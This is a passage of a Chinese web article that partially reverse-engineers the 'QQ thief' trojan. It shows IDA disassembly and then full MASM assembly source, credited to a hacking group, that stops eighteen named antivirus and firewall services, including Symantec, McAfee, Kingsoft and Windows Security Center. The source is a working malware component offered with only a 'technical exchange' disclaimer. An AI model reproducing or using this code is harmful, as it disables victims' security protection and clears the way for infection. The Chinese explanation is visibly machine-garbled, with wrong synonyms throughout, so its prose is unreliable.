不完全逆向分析啊拉QQ大盗

  .shrink:0040967C loc_40967C:                  
  .shrink:0040967C           push   offset ServiceStatus ; lpServiceStatus
  .shrink:00409681           push   esi         ; hService
  .shrink:00409682           call   QueryServiceStatus ; 查询设备驱动器确以后形态
  .shrink:00409682
  .shrink:00409687           test   eax, eax
  .shrink:00409689           jnz   short loc_409669 ; 查询未成功,连续休泯,然后再查询
  .shrink:00409689
  .shrink:0040968B
  .shrink:0040968B loc_40968B:                  
  .shrink:0040968B           cmp   ServiceStatus.dwCurrentState, 1
  .shrink:00409692           jz     short loc_4096A8 ; 对比是否收到控制代码SERVICE_STOP_PENDING
  .shrink:00409692
  .shrink:00409694           push   esi         ; hSCObject
  .shrink:00409695           call   CloseServiceHandle ; 封闭这个服务
  .shrink:00409695
  .shrink:0040969A           push   edi         ; hSCObject
  .shrink:0040969B           call   CloseServiceHandle
  .shrink:0040969B
  .shrink:004096A0           jmp   short loc_4096A8
  .shrink:004096A0
  .shrink:004096A2 ; ---------------------------------------------------------------------------
  .shrink:004096A2
  .shrink:004096A2 loc_4096A2:                  
  .shrink:004096A2           push   edi         ; hSCObject
  .shrink:004096A3           call   CloseServiceHandle ; 封闭翻开服务办理器的句柄
  .shrink:004096A3
  .shrink:004096A8
  .shrink:004096A8 loc_4096A8:                  
  .shrink:004096A8                          
  .shrink:004096A8                          
  .shrink:004096A8                          
  .shrink:004096A8           xor   eax, eax
  .shrink:004096AA           pop   edx
  .shrink:004096AB           pop   ecx
  .shrink:004096AC           pop   ecx
  .shrink:004096AD           mov   fs:[eax], edx
  .shrink:004096B0           push   4096C5h ;
  .shrink:004096B5           lea   eax, [ebp+var_4]
  .shrink:004096B8           call   sub_403B68
  .shrink:004096B8
  .shrink:004096BD           retn
  .shrink:004096BD
  .shrink:004096BD sub_4095FC     endp ; sp = -18h
  原来是通过毗连服务器设备办理器来封闭服务,如果函数ControlService实行不成功的话,就封闭句柄退了出去,反之,查询一下ControlService函数封闭后办理器前往的ServiceStatus的结组成员dwCurrentState的值非SERVICE_STOP_PENDING的标记,就代表封闭成功,就可以封闭这个服务了.其实这是很简略的.
  下面就给出汇编源代码
  Copy code
  ;指导指导指导指导指导指导指导指导指导指导指导
  ;步伐编写by Asm
  ;日期：2007-3-07日
  ;出处：红狼安全小组
  ;注意事项：如欲转载，请连结本步伐的完整，并注明：
  ;注意事项:颁布源码仅限技能交换,如果使用引起的损失,由使用者自己全部负责!
  ;指导指导指导指导指导指导指导指导指导指导*****
  .386
  .model flat, stdcall
  option casemap :none
  include windows.inc
  include kernel32.inc
  include advapi32.inc
  includelib kernel32.lib
  includelib advapi32.lib
  _CloseService PROTO :DWORD
  .data
  s_Rsccenter db "RsCCenter"
  s_Kvsrvxp db "KVSrvXP"
  s_Kavsvc db "kavsvc"
  s_Kpfwsvc db "KPfwSvc"
  s_Kwatchsvc db "KWatchSvc"
  s_Wscsvc db "wscsvc"
  s_Sndsrvc db "SNDSrvc"
  s_Ccproxy db "ccProxy"
  s_Ccevtmgr db "ccEvtMgr"
  s_Ccsetmgr db "ccSetMgr"
  s_Spbbcsvc db "SPBBCSvc"
  s_SymantecCoreL db "Symantec Core LC"
  s_Navapsvc db "navapsvc"
  s_Npfmntor db "NPFMntor"
  s_Mskservice db "MskService"
  s_Mctaskmanager db "McTaskManager"
  s_Mcshield db "McShield"
  s_Mcafeeframewo db "McAfeeFramework"
  .code
  _CloseService proc _Service
  local hSCManager:DWORD
  local hService:DWORD
  local ServiceStatus:SERVICE_STATUS
  invoke OpenSCManager,NULL,NULL, SC_MANAGER_CREATE_SERVICE ;毗连服务办理器
  .if eax!=0
  mov   hSCManager, eax ;毗连成功，前往一个句柄
  .elseif
  jmp ExitSCManager
  .endif
  invoke OpenService, hSCManager,_Service,0F01FFh ;翻开服务
  .if eax!=0
  mov hService,eax
  .elseif
  jmp ExitSCManager
  .endif
  invoke ControlService,hService,SERVICE_CONTROL_STOP,addr ServiceStatus ;制止防火墙的服务
  .if eax == NULL
  jmp ExitSCManager
  .endif
  invoke Sleep,1000
  invoke QueryServiceStatus,hService,addr ServiceStatus ;查询前往的标记
  .if eax != NULL
  cmp ServiceStatus.dwCurrentState,SERVICE_STOP_PENDING ;获取SERVICE_STOP_PENDING标记代表封闭成功
  jnz ColseIt
  .endif
  ColseIt:
  cmp ServiceStatus.dwCurrentState,1h
  jz ExitSCManager
  invoke CloseServiceHandle,hService
  invoke CloseServiceHandle,hSCManager
  ExitSCManager:
  invoke CloseServiceHandle, hSCManager
  invoke ExitProcess,NULL
  _CloseService endp
  ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  start:
  invoke _CloseService,addr s_Rsccenter
  invoke _CloseService,addr s_Kvsrvxp
  invoke _CloseService,addr s_Kavsvc
  invoke _CloseService,addr s_Kpfwsvc
  invoke _CloseService,addr s_Kwatchsvc
  invoke _CloseService,addr s_Wscsvc
  invoke _CloseService,addr s_Sndsrvc
  invoke _CloseService,addr s_Ccproxy
  invoke _CloseService,addr s_Ccevtmgr
  invoke _CloseService,addr s_Ccsetmgr
  invoke _CloseService,addr s_Spbbcsvc
  invoke _CloseService,addr s_SymantecCoreL
  invoke _CloseService,addr s_Navapsvc
  invoke _CloseService,addr s_Npfmntor
  invoke _CloseService,addr s_Mskservice
  invoke _CloseService,addr s_Mctaskmanager
  invoke _CloseService,addr s_Mcshield
  invoke _CloseService,addr s_Mcafeeframewo
  end start
 

上一页12下一页

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:

评论加载中... 内容： 评论者： 验证码：